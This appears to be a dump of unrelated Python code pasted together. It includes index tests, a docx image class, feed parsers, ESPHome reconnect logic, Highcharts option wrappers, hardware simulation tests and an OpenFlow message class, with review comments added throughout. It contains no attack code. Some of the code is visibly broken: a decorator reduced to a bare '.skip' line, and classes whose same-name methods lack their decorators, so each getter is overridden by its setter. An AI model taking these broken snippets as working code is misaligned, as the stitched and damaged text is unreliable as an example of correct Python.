        parent = Root
        for (depth, row) in enumerate(sequence):
            with self.subTest(depth=depth):
                index_1 = self.index_manager.create_index(parent, row)
                index_2 = self.index_manager.create_index(parent, row)
                self.assertIs(index_1, index_2)
                parent = index_1

    def test_complex_index_to_sequence(self):
        """An index at depth d converts to the sequence prefix of length d+1."""
        sequence = (5, 6, 7, 8, 9, 10)
        parent = Root
        for (depth, row) in enumerate(sequence):
            with self.subTest(depth=depth):
                index = self.index_manager.create_index(parent, row)
                result = self.index_manager.to_sequence(index)
                self.assertEqual(result, sequence[:(depth + 1)])
                parent = index

    def test_complex_index_sequence_round_trip(self):
        """index -> sequence -> index yields the identical object at every depth."""
        parent = Root
        for (depth, row) in enumerate([5, 6, 7, 8, 9, 10]):
            with self.subTest(depth=depth):
                index = self.index_manager.create_index(parent, row)
                sequence = self.index_manager.to_sequence(index)
                result = self.index_manager.from_sequence(sequence)
                self.assertIs(result, index)
                parent = index

    def test_complex_index_id_round_trip(self):
        """index -> integer id -> index yields the identical object at every depth.

        FIX: the local previously named ``id`` shadowed the builtin; renamed.
        """
        sequence = (5, 6, 7, 8, 9, 10)
        parent = Root
        for (depth, row) in enumerate(sequence):
            with self.subTest(depth=depth):
                index = self.index_manager.create_index(parent, row)
                index_id = self.index_manager.id(index)
                self.assertIsInstance(index_id, int)
                result = self.index_manager.from_id(index_id)
                self.assertIs(result, index)
                parent = index
class InlineImage(object):
    """An image rendered inline within a docx template's run of text.

    Holds the template object, the image descriptor, and optional dimensions;
    renders itself as the WordprocessingML needed to splice a drawing into a run.
    """

    # Class-level defaults, overwritten per instance in __init__.
    tpl = None
    image_descriptor = None
    width = None
    height = None

    def __init__(self, tpl, image_descriptor, width=None, height=None):
        self.tpl = tpl
        self.image_descriptor = image_descriptor
        self.width = width
        self.height = height

    def _insert_image(self):
        """Build the XML fragment that closes the current run and embeds the picture."""
        part = self.tpl.current_rendering_part
        pic = part.new_pic_inline(self.image_descriptor, self.width, self.height).xml
        return ('</w:t></w:r><w:r><w:drawing>%s</w:drawing></w:r><w:r><w:t xml:space="preserve">' % pic)

    def __unicode__(self):
        return self._insert_image()

    def __str__(self):
        return self._insert_image()

    def __html__(self):
        return self._insert_image()
def extractMobileSuitZetaGundamNovelsTranslation(item):
    """Parse a feed item for the Zeta Gundam novels translation.

    Returns a release message for 'WATTT'-tagged items, None for previews or
    items without volume/chapter numbering, and False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    has_numbering = bool(chp or vol)
    if not has_numbering or 'preview' in item['title'].lower():
        return None
    if 'WATTT' in item['tags']:
        return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
    return False
def extractYellowpufffWordpressCom(item):
    """Parse a feed item from yellowpufff.wordpress.com into a release message.

    Returns None for previews or items without numbering, a typed release
    message for the first matching tag, and False when nothing matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag to look for, series name, translation type)
    tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    matches = (entry for entry in tagmap if entry[0] in item['tags'])
    for _tagname, name, tl_type in matches:
        # First matching tag wins.
        return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class IAsyncTrainingStartTimeDistr(abc.ABC):
    """Interface for distributions governing async training start times.

    NOTE(review): ``_set_defaults_in_cfg`` takes ``cls`` and both methods below
    have empty bodies — upstream presumably decorates them with @classmethod /
    @abstractmethod; the decorators appear stripped in this dump. Confirm.
    """

    def __init__(self, **kwargs) -> None:
        # Project helper that attaches a validated cfg (AsyncTrainingStartTimeDistrConfig).
        init_self_cfg(self, component_class=__class__, config_class=AsyncTrainingStartTimeDistrConfig, **kwargs)
        assert (self.cfg.training_rate > 0), f'Event rate must be positive, got {self.cfg.training_rate}'

    def _set_defaults_in_cfg(cls, cfg):
        # Hook for subclasses to fill config defaults; intentionally a no-op here.
        pass

    def time_to_next_event_start(self) -> float:
        # Subclasses return the delay (seconds, presumably) until the next training start.
        pass
# NOTE(review): decorator lost its "@pytest.mark" prefix in this dump — presumably
# "@pytest.mark.skip".
.skip
def test_en_ner_simple_types(NLP):
    """English NER should label 'Mr. Best' as PERSON and 'New York' as GPE."""
    doc = NLP('Mr. Best flew to New York on Saturday morning.')
    # Token spans are [start, end) over the tokenized document.
    assert (doc.ents[0].start == 1)
    assert (doc.ents[0].end == 2)
    assert (doc.ents[0].label_ == 'PERSON')
    assert (doc.ents[1].start == 4)
    assert (doc.ents[1].end == 6)
    assert (doc.ents[1].label_ == 'GPE')
class TwoPartSimpleModel(nn.Module):
    """Two traceable submodels separated by a non-traceable function.

    Used to exercise export of models that cannot be traced end-to-end: each
    part is exported separately and stitched together by RunFunc.
    """

    def __init__(self):
        super().__init__()
        self.part1 = SimpleModel()
        self.part2 = SimpleModel()

    def forward(self, x):
        x = self.part1(x)
        # The non-traceable step is called via the class to avoid binding self.
        x = TwoPartSimpleModel.non_traceable_func(x)
        x = self.part2(x)
        return x

    def prepare_for_export(self, cfg, inputs, predictor_type):
        """Describe how to export part1/part2 separately plus how to run them together."""
        def data_generator(x):
            # Capture the exact inputs each part sees during a forward pass.
            part1_args = (x,)
            x = self.part1(x)
            x = TwoPartSimpleModel.non_traceable_func(x)
            part2_args = (x,)
            return {'part1': part1_args, 'part2': part2_args}
        return PredictorExportConfig(model={'part1': self.part1, 'part2': self.part2}, data_generator=data_generator, run_func_info=FuncInfo.gen_func_info(TwoPartSimpleModel.RunFunc, params={}))

    # NOTE(review): takes no self and is always called via the class — presumably
    # meant to be a @staticmethod (decorator stripped in this dump); confirm.
    def non_traceable_func(x):
        # Data-dependent branching on rank makes this untraceable.
        return ((x + 1) if (len(x.shape) > 3) else (x - 1))

    class RunFunc(object):
        """Re-assembles the full forward pass from the exported part1/part2 models."""

        def __call__(self, model, x):
            assert isinstance(model, dict)
            x = model['part1'](x)
            x = TwoPartSimpleModel.non_traceable_func(x)
            x = model['part2'](x)
            return x
def test_io_dispersive(tmp_path):
    """A simulation with a custom dispersive (Lorentz) medium round-trips through HDF5."""
    Mx_custom = 1.0
    My_custom = 2.1
    Nx = 10
    Ny = 11
    # Spatial grid for the custom-medium datasets, centered on the origin.
    x_custom = np.linspace(((- Mx_custom) / 2), (Mx_custom / 2), Nx)
    y_custom = np.linspace(((- My_custom) / 2), (My_custom / 2), Ny)
    z_custom = [0]
    delep_data = np.ones([len(x_custom), len(y_custom), len(z_custom)])
    delep_dataset = td.SpatialDataArray(delep_data, coords={'x': x_custom, 'y': y_custom, 'z': z_custom})
    gamma_dataset = xr.zeros_like(delep_dataset)
    f0_dataset = td.SpatialDataArray((np.ones_like(delep_data) * .0), coords={'x': x_custom, 'y': y_custom, 'z': z_custom})
    eps_inf_dataset = xr.ones_like(delep_dataset)
    # Single Lorentz pole: (delta_eps, f0, gamma) triplet of spatial datasets.
    mat_custom = td.CustomLorentz(eps_inf=eps_inf_dataset, coeffs=((delep_dataset, f0_dataset, gamma_dataset),))
    struct = td.Structure(geometry=td.Box(size=(0.5, 0.5, 0.5)), medium=mat_custom)
    sim = td.Simulation(run_time=1e-12, size=(1, 1, 1), grid_spec=td.GridSpec.auto(wavelength=1.0), structures=(struct,))
    filename = str((tmp_path / 'sim.hdf5'))
    sim.to_file(filename)
    sim_load = td.Simulation.from_file(filename)
    # Serialization must preserve equality, including the custom medium data.
    assert (sim_load == sim)
class Dispatcher():
    """Maps Operation types to handler functions, resolving via the MRO.

    Handlers are registered with the ``dispatch_for`` decorator; ``dispatch``
    walks an object's class hierarchy to find the most specific handler.
    """

    def __init__(self):
        # Registered Operation subclass -> handler callable.
        self._registry: Dict[(Type[Operation], Callable[([Operation], str)])] = {}

    def dispatch_for(self, target: Type[Operation]) -> Callable[([Callable[([Operation], str)]], Callable[([Operation], str)])]:
        """Decorator factory registering the wrapped function as the handler for *target*."""
        def wrap(fn: Callable[([Operation], str)]) -> Callable[([Operation], str)]:
            self._registry[target] = fn
            return fn
        return wrap

    def dispatch(self, obj: Operation):
        """Return the handler for obj's most specific registered class, or raise ValueError."""
        for candidate in type(obj).__mro__:
            if candidate in self._registry:
                return self._registry[candidate]
        raise ValueError(f'no dispatch function for object: {obj}')
class JsCookies():
    """Generates JavaScript snippets for reading/writing document cookies."""

    def __init__(self, page: Optional[primitives.PageModel]):
        self.page = page

    def set(self, key: str, data, data_key: str=None, python_data=True, js_funcs: Optional[Union[(list, str)]]=None):
        """Return the JS statement assigning *data* to cookie *key*.

        The first call on a page initializes the cookies object; subsequent
        calls assign individual keys. The page context flag tracks this.
        """
        data = JsUtils.jsConvert(data, data_key, python_data, js_funcs)
        if (self.page._context.get('cookies') is None):
            self.page._context['cookies'] = True
            return ("document.cookies = {'%s': %s}" % (key, data))
        return ("document.cookies['%s'] = %s" % (key, data))

    def get(self, data: Union[(str, primitives.JsDataModel)]=None, js_conv_func: Optional[Union[(str, list)]]=True, js_result_func: Optional[str]=None):
        """Return a JS expression reading all cookies, or a single cookie when *data* is given."""
        if (data is None):
            return Js.JsJson().parse('decodeURIComponent(document.cookies)', js_result_func=js_result_func)
        data = JsUtils.jsConvertData(data, js_conv_func)
        return Js.JsJson().parse(("decodeURIComponent(document.cookies)['%s']" % data), js_result_func=js_result_func)
class OptionSeriesPictorialSonificationDefaultspeechoptionsMapping(Options):
    """Auto-generated options wrapper for Highcharts sonification speech mappings.

    NOTE(review): ``text`` is defined twice (getter-style and setter-style) —
    upstream presumably decorates them with @property / @text.setter; as written
    the second definition overrides the first. Confirm against the generator.
    """

    def pitch(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPitch':
        return self._config_sub_data('pitch', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPitch)

    def playDelay(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPlaydelay':
        return self._config_sub_data('playDelay', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingPlaydelay)

    def rate(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingRate':
        return self._config_sub_data('rate', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingRate)

    def text(self):
        # Getter: returns the configured text mapping (None when unset).
        return self._config_get(None)

    def text(self, text: str):
        # Setter: stores the text mapping as a plain (non-JS) value.
        self._config(text, js_type=False)

    def time(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingTime':
        return self._config_sub_data('time', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingTime)

    def volume(self) -> 'OptionSeriesPictorialSonificationDefaultspeechoptionsMappingVolume':
        return self._config_sub_data('volume', OptionSeriesPictorialSonificationDefaultspeechoptionsMappingVolume)
def load_config_files(config_paths: list) -> dict:
    """Load and merge HJSON config files; later files override earlier keys.

    Parameters
    ----------
    config_paths : list
        Paths to HJSON files, applied in order.

    Returns
    -------
    dict
        The merged configuration (empty when no paths are given).

    Raises
    ------
    Exception
        Wrapping the offending path and original error when any file fails
        to load or merge.
    """
    config = {}
    for config_path in config_paths:
        try:
            # FIX: the file handle was previously never closed; use a context manager.
            with open(config_path, encoding='utf-8') as config_file:
                loaded_config = hjson.load(config_file)
            config = {**config, **loaded_config}
        except Exception as e:
            # Chain the original error so the traceback keeps the root cause.
            raise Exception('failed to load config file', config_path, e) from e
    return config
def test_script(flatpak_builder: FlatpakBuilder) -> None:
    """A script source builds into an executable file with a shebang and the commands."""
    COMMANDS = ['echo 123']
    with ManifestGenerator() as gen:
        gen.add_script_source(COMMANDS, Path('script'))
        flatpak_builder.build(sources=gen.ordered_sources())
    with (flatpak_builder.module_dir / 'script').open() as fp:
        # First line must be the interpreter shebang, then the commands verbatim.
        assert fp.readline().startswith('#!')
        assert (fp.readline().strip() == 'echo 123')
class SplitterGroupEditor(GroupEditor):
    """Group editor backed by a QSplitter, persisting the splitter layout in prefs."""

    # The concrete Qt splitter holding the group's panes.
    splitter = Instance(_GroupSplitter)

    def restore_prefs(self, prefs):
        """Restore the splitter state; accepts either a dict or a raw state blob (legacy)."""
        if isinstance(prefs, dict):
            structure = prefs.get('structure')
        else:
            structure = prefs
        # Mark initialized so the restore isn't overwritten by deferred setup.
        self.splitter._initialized = True
        self.splitter.restoreState(structure)

    def save_prefs(self):
        """Serialize the splitter layout into a prefs dict."""
        return {'structure': self.splitter.saveState().data()}
class ReconnectLogic(zeroconf.RecordUpdateListener):
    """Keeps an ESPHome API connection alive.

    On disconnect, reconnect attempts are retried with exponential backoff
    (capped at 60s).  While waiting between attempts, a zeroconf listener
    is registered so that a matching mDNS announcement from the device
    triggers an immediate reconnect instead of waiting out the backoff.
    """
    def __init__(self, *, client: APIClient, on_connect: Callable[([], Awaitable[None])], on_disconnect: Callable[([bool], Awaitable[None])], zeroconf_instance: (ZeroconfInstanceType | None)=None, name: (str | None)=None, on_connect_error: (Callable[([Exception], Awaitable[None])] | None)=None) -> None:
        """Store callbacks and initialize in the stopped, disconnected state.

        :param client: API client to (re)connect.
        :param on_connect: awaited after a fully established connection.
        :param on_disconnect: awaited on disconnect with a bool telling
            whether the disconnect was expected.
        :param zeroconf_instance: optional externally-owned zeroconf instance.
        :param name: device name; if omitted, derived from the client address
            when that address looks like a name / .local hostname.
        :param on_connect_error: awaited with the exception when an attempt fails.
        """
        self.loop = asyncio.get_event_loop()
        self._cli = client
        self.name: (str | None) = None
        if name:
            self.name = name
        elif (host_is_name_part(client.address) or address_is_local(client.address)):
            # Use the bare hostname part of e.g. "devname.local".
            self.name = client.address.partition('.')[0]
        if self.name:
            self._cli.set_cached_name_if_unset(self.name)
        self._on_connect_cb = on_connect
        self._on_disconnect_cb = on_disconnect
        self._on_connect_error_cb = on_connect_error
        self._zeroconf_manager = client.zeroconf_manager
        if (zeroconf_instance is not None):
            self._zeroconf_manager.set_instance(zeroconf_instance)
        # mDNS record names we watch for (set when the listener starts).
        self._ptr_alias: (str | None) = None
        self._a_name: (str | None) = None
        self._connection_state = ReconnectLogicState.DISCONNECTED
        self._accept_zeroconf_records: bool = True
        # Guards all connection-state transitions.
        self._connected_lock = asyncio.Lock()
        self._is_stopped = True
        self._zc_listening = False
        # Consecutive failed attempts; drives the backoff.
        self._tries = 0
        self._connect_task: (asyncio.Task[None] | None) = None
        self._connect_timer: (asyncio.TimerHandle | None) = None
        self._stop_task: (asyncio.Task[None] | None) = None
    async def _on_disconnect(self, expected_disconnect: bool) -> None:
        """Handle a disconnect reported by the client; schedule a reconnect
        unless this logic has been stopped."""
        if expected_disconnect:
            disconnect_type = 'expected'
            # Give the device a moment (e.g. after a reboot) before retrying.
            wait = EXPECTED_DISCONNECT_COOLDOWN
        else:
            disconnect_type = 'unexpected'
            wait = 0
        _LOGGER.info('Processing %s disconnect from ESPHome API for %s', disconnect_type, self._cli.log_name)
        async with self._connected_lock:
            self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
            (await self._on_disconnect_cb(expected_disconnect))
        if (not self._is_stopped):
            self._schedule_connect(wait)
    def _async_set_connection_state_while_locked(self, state: ReconnectLogicState) -> None:
        """Set the connection state; caller must hold the connected lock."""
        assert self._connected_lock.locked(), 'connected_lock must be locked'
        self._async_set_connection_state_without_lock(state)
    def _async_set_connection_state_without_lock(self, state: ReconnectLogicState) -> None:
        """Set the connection state and update whether mDNS records may
        trigger a reconnect (only while not yet connected)."""
        self._connection_state = state
        self._accept_zeroconf_records = (state in NOT_YET_CONNECTED_STATES)
    def _async_log_connection_error(self, err: Exception) -> None:
        """Log a failed attempt; the level de-escalates from WARNING (first
        failure) to DEBUG (repeats), but unexpected exception types are ERROR."""
        is_handled_exception = ((not isinstance(err, UnhandledAPIConnectionError)) and isinstance(err, APIConnectionError))
        if (not is_handled_exception):
            level = logging.ERROR
        elif (self._tries == 0):
            level = logging.WARNING
        else:
            level = logging.DEBUG
        _LOGGER.log(level, "Can't connect to ESPHome API for %s: %s (%s)", self._cli.log_name, err, type(err).__name__, exc_info=(not is_handled_exception))
    async def _try_connect(self) -> bool:
        """Run one full connection attempt (connect + handshake).

        Returns True on success.  Caller must hold the connected lock.
        """
        self._async_set_connection_state_while_locked(ReconnectLogicState.CONNECTING)
        start_connect_time = time.perf_counter()
        try:
            (await self._cli.start_connection(on_stop=self._on_disconnect))
        except Exception as err:
            (await self._handle_connection_failure(err))
            return False
        finish_connect_time = time.perf_counter()
        connect_time = (finish_connect_time - start_connect_time)
        _LOGGER.info('Successfully connected to %s in %0.3fs', self._cli.log_name, connect_time)
        # Connected at the transport level; no need to watch mDNS anymore.
        self._stop_zc_listen()
        self._async_set_connection_state_while_locked(ReconnectLogicState.HANDSHAKING)
        try:
            (await self._cli.finish_connection(login=True))
        except Exception as err:
            (await self._handle_connection_failure(err))
            return False
        self._tries = 0
        finish_handshake_time = time.perf_counter()
        handshake_time = (finish_handshake_time - finish_connect_time)
        _LOGGER.info('Successful handshake with %s in %0.3fs', self._cli.log_name, handshake_time)
        self._async_set_connection_state_while_locked(ReconnectLogicState.READY)
        (await self._on_connect_cb())
        return True
    async def _handle_connection_failure(self, err: Exception) -> None:
        """Record a failed attempt: notify the error callback, log, and bump
        the retry counter (jumping straight to max backoff on auth errors)."""
        self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
        if (self._on_connect_error_cb is not None):
            (await self._on_connect_error_cb(err))
        self._async_log_connection_error(err)
        if isinstance(err, AUTH_EXCEPTIONS):
            # Retrying fast won't fix bad credentials; back off maximally.
            self._tries = MAXIMUM_BACKOFF_TRIES
        else:
            self._tries += 1
    def _schedule_connect(self, delay: float) -> None:
        """Schedule the next connection attempt after *delay* seconds
        (immediately when delay is 0), replacing any pending timer."""
        if (not delay):
            self._call_connect_once()
            return
        _LOGGER.debug('Scheduling new connect attempt in %.2f seconds', delay)
        self._cancel_connect_timer()
        self._connect_timer = self.loop.call_at((self.loop.time() + delay), self._call_connect_once)
    def _call_connect_once(self) -> None:
        """Start a connect task, cancelling a stale one only if it is still
        in the CONNECTING phase (a handshake in progress is left alone)."""
        if (self._connect_task and (not self._connect_task.done())):
            if (self._connection_state != ReconnectLogicState.CONNECTING):
                _LOGGER.debug('%s: Not cancelling existing connect task as its already %s!', self._cli.log_name, self._connection_state)
                return
            _LOGGER.debug('%s: Cancelling existing connect task with state %s, to try again now!', self._cli.log_name, self._connection_state)
            self._cancel_connect_task('Scheduling new connect attempt')
            self._async_set_connection_state_without_lock(ReconnectLogicState.DISCONNECTED)
        self._connect_task = asyncio.create_task(self._connect_once_or_reschedule(), name=f'{self._cli.log_name}: aioesphomeapi connect')
    def _cancel_connect_timer(self) -> None:
        """Cancel a pending reconnect timer, if any."""
        if self._connect_timer:
            self._connect_timer.cancel()
            self._connect_timer = None
    def _cancel_connect_task(self, msg: str) -> None:
        """Cancel the in-flight connect task, if any."""
        if self._connect_task:
            self._connect_task.cancel(msg)
            self._connect_task = None
    def _cancel_connect(self, msg: str) -> None:
        """Cancel both the reconnect timer and the in-flight connect task."""
        self._cancel_connect_timer()
        self._cancel_connect_task(msg)
    async def _connect_once_or_reschedule(self) -> None:
        """Attempt one connection; on failure, schedule a retry with
        exponential backoff and start listening for mDNS announcements."""
        _LOGGER.debug('Trying to connect to %s', self._cli.log_name)
        async with self._connected_lock:
            _LOGGER.debug('Connected lock acquired for %s', self._cli.log_name)
            if ((self._connection_state != ReconnectLogicState.DISCONNECTED) or self._is_stopped):
                return
            if (await self._try_connect()):
                return
            tries = min(self._tries, 10)
            # Exponential backoff: 1.8^tries seconds, capped at 60s.
            wait_time = int(round(min((1.8 ** tries), 60.0)))
            if (tries == 1):
                _LOGGER.info('Trying to connect to %s in the background', self._cli.log_name)
            _LOGGER.debug('Retrying %s in %.2f seconds', self._cli.log_name, wait_time)
            if wait_time:
                self._start_zc_listen()
            self._schedule_connect(wait_time)
    def _remove_stop_task(self, _fut: asyncio.Future[None]) -> None:
        """Done-callback: drop the reference to the finished stop task."""
        self._stop_task = None
    def stop_callback(self) -> None:
        """Synchronous entry point to stop: schedules stop() as a task."""
        self._stop_task = asyncio.create_task(self.stop(), name=f'{self._cli.log_name}: aioesphomeapi reconnect_logic stop_callback')
        self._stop_task.add_done_callback(self._remove_stop_task)
    async def start(self) -> None:
        """Begin maintaining the connection (first attempt is immediate)."""
        async with self._connected_lock:
            self._is_stopped = False
            if (self._connection_state != ReconnectLogicState.DISCONNECTED):
                return
            self._tries = 0
            self._schedule_connect(0.0)
    async def stop(self) -> None:
        """Stop reconnecting, tear down listeners and close zeroconf."""
        if (self._connection_state in NOT_YET_CONNECTED_STATES):
            # Cancel early (before taking the lock) so a connect task that
            # currently holds the lock does not block the shutdown.
            self._cancel_connect('Stopping')
        async with self._connected_lock:
            self._is_stopped = True
            self._cancel_connect('Stopping')
            self._stop_zc_listen()
            self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
        (await self._zeroconf_manager.async_close())
    def _start_zc_listen(self) -> None:
        """Register as a zeroconf listener for this device's records
        (no-op without a device name or if already listening)."""
        if ((not self._zc_listening) and self.name):
            _LOGGER.debug('Starting zeroconf listener for %s', self.name)
            self._ptr_alias = f'{self.name}._esphomelib._tcp.local.'
            self._a_name = f'{self.name}.local.'
            self._zeroconf_manager.get_async_zeroconf().zeroconf.async_add_listener(self, None)
            self._zc_listening = True
    def _stop_zc_listen(self) -> None:
        """Unregister the zeroconf listener, if registered."""
        if self._zc_listening:
            _LOGGER.debug('Removing zeroconf listener for %s', self.name)
            self._zeroconf_manager.get_async_zeroconf().zeroconf.async_remove_listener(self)
            self._zc_listening = False
    def _connect_from_zeroconf(self) -> None:
        """Immediate reconnect triggered by a matching mDNS record."""
        self._stop_zc_listen()
        self._schedule_connect(0.0)
    def async_update_records(self, zc: zeroconf.Zeroconf, now: float, records: list[zeroconf.RecordUpdate]) -> None:
        """zeroconf callback: if any record matches this device's PTR alias
        or A name, trigger a reconnect (at most once per listen cycle)."""
        if ((not self._accept_zeroconf_records) or self._is_stopped):
            return
        for record_update in records:
            new_record = record_update.new
            if (not (((new_record.type == TYPE_PTR) and (new_record.alias == self._ptr_alias)) or ((new_record.type == TYPE_A) and (new_record.name == self._a_name)))):
                continue
            _LOGGER.debug('%s: Triggering connect because of received mDNS record %s', self._cli.log_name, record_update.new)
            # call_soon: we are inside zeroconf's callback; defer to the loop.
            self.loop.call_soon(self._connect_from_zeroconf)
            self._accept_zeroconf_records = False
            return
class NoScrollZoom(MacroElement):
    """Folium macro element that disables mouse-wheel zooming on the parent
    map by emitting a ``scrollWheelZoom.disable()`` call in its script."""
    _name = 'NoScrollZoom'
    _template = Template('\n    {% macro header(this,kwargs) %}\n    {% endmacro %}\n    {% macro html(this,kwargs) %}\n    {% endmacro %}\n    {% macro script(this,kwargs) %}\n    {{ this._parent.get_name() }}.scrollWheelZoom.disable();\n    {% endmacro %}\n    ')
class VerilatorLPDDR4Tests(unittest.TestCase):
    """Runs the LPDDR4 simulation SoC under Verilator and checks that the
    built-in memtest passes and the simulation log contains no unexpected
    warnings/errors."""
    # (level, message-substring) pairs that are known-benign in simulation
    # (timings are deliberately shortened to speed up the run).
    ALLOWED = [('WARN', 'tINIT1 violated: RESET deasserted too fast'), ('WARN', 'tINIT3 violated: CKE set HIGH too fast after RESET being released')]
    def check_logs(self, logs):
        """Fail on any WARN/ERROR log line that is not in ALLOWED."""
        for match in SimLogger.LOG_PATTERN.finditer(logs):
            if (match.group('level') in ['WARN', 'ERROR']):
                allowed = any((((lvl == match.group('level')) and (msg in match.group('msg'))) for (lvl, msg) in self.ALLOWED))
                self.assertTrue(allowed, msg=match.group(0))
    def run_test(self, args, **kwargs):
        """Spawn the simulation with *args* and wait for the memtest verdict.

        The timeout is generous (12 minutes) because Verilator simulation
        of a full memtest is slow.
        """
        import pexpect
        command = ['python3', simsoc.__file__, *args]
        timeout = (12 * 60)
        p = pexpect.spawn(' '.join(command), timeout=timeout, **kwargs)
        res = p.expect(['Memtest OK', 'Memtest KO'])
        self.assertEqual(res, 0, msg="{}\nGot '{}'".format(p.before.decode(), p.after.decode()))
        self.check_logs(p.before.decode())
    def test_lpddr4_sim_x2rate_no_cache(self):
        # Double-rate PHY, L2 cache disabled, refresh disabled.
        self.run_test(['--finish-after-memtest', '--log-level', 'warn', '--output-dir', 'build/test_lpddr4_sim_x2rate_no_cache', '--double-rate-phy', '--l2-size', '0', '--no-refresh'])
    def test_lpddr4_sim_fast(self):
        # Fast variant: PHY init delays disabled, refresh disabled.
        self.run_test(['--finish-after-memtest', '--log-level', 'warn', '--output-dir', 'build/test_lpddr4_sim_fast', '--disable-delay', '--no-refresh'])
class OptionSeriesBarSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
    """Option proxy for the sonification highpass-frequency mapping.

    BUG FIX: the original declared each getter/setter pair as two plain
    methods with the same name, so the second ``def`` silently shadowed
    the first and every getter was unreachable dead code.  Restored the
    property protocol (``@property`` + ``@<name>.setter``) used by this
    option-class pattern, so both attribute read and assignment work.
    """

    @property
    def mapFunction(self):
        # No default: returns whatever was configured, else None.
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def test_output_reference_with_attr_path():
    """OutputReference keeps its attr_path and survives an IDL round trip."""
    ref = _types.OutputReference(node_id='node1', var='var1', attr_path=['a', 0])
    assert ref.node_id == 'node1'
    assert ref.var == 'var1'
    assert ref.attr_path[0] == 'a'
    assert ref.attr_path[1] == 0
    # Serialize to protobuf and back; equality must be preserved.
    round_tripped = _types.OutputReference.from_flyte_idl(ref.to_flyte_idl())
    assert ref == round_tripped
class OptionPlotoptionsColumnSonificationContexttracksMappingTremoloSpeed(Options):
    """Option proxy for the sonification tremolo-speed mapping.

    BUG FIX: the original declared each getter/setter pair as two plain
    methods with the same name, so the second ``def`` silently shadowed
    the first and every getter was unreachable dead code.  Restored the
    property protocol (``@property`` + ``@<name>.setter``) used by this
    option-class pattern, so both attribute read and assignment work.
    """

    @property
    def mapFunction(self):
        # No default: returns whatever was configured, else None.
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class queue_stats_request(stats_request):
    """Generated OpenFlow (wire version 6 / OF1.5) queue-stats request message.

    NOTE(review): this looks like pyloxi-generated code.  ``pack`` joins
    ``str`` fragments (including the ``'\\x00' * 4`` pad) — Python-2-era
    bytes-as-str handling; under Python 3 ``struct.pack`` returns ``bytes``
    and ``''.join`` would fail.  Confirm the targeted Python version.
    """
    version = 6
    type = 18
    stats_type = 5
    def __init__(self, xid=None, flags=None, port_no=None, queue_id=None):
        # All fields default to 0 except xid, which stays None so the
        # transaction layer can assign one later.
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (port_no != None):
            self.port_no = port_no
        else:
            self.port_no = 0
        if (queue_id != None):
            self.queue_id = queue_id
        else:
            self.queue_id = 0
        return
    def pack(self):
        """Serialize to the wire format; the length field (bytes 2-3) is
        back-patched once the total size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        # 4 bytes of padding after the stats-request header.
        packed.append(('\x00' * 4))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack('!L', self.queue_id))
        length = sum([len(x) for x in packed])
        # Back-patch the message length into the placeholder at index 2.
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)
    def unpack(reader):
        """Parse a queue_stats_request from *reader*.

        NOTE(review): takes ``reader`` (not ``self``) — in pyloxi this is a
        ``@staticmethod``; the decorator appears to have been stripped.
        """
        obj = queue_stats_request()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 18)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict reading to this message's bytes (length field at offset 4).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 5)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)
        obj.port_no = util.unpack_port_no(reader)
        obj.queue_id = reader.read('!L')[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; requires the exact same class.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.port_no != other.port_no):
            return False
        if (self.queue_id != other.queue_id):
            return False
        return True
    def pretty_print(self, q):
        """Write a human-readable rendering to the pretty-printer *q*."""
        q.text('queue_stats_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
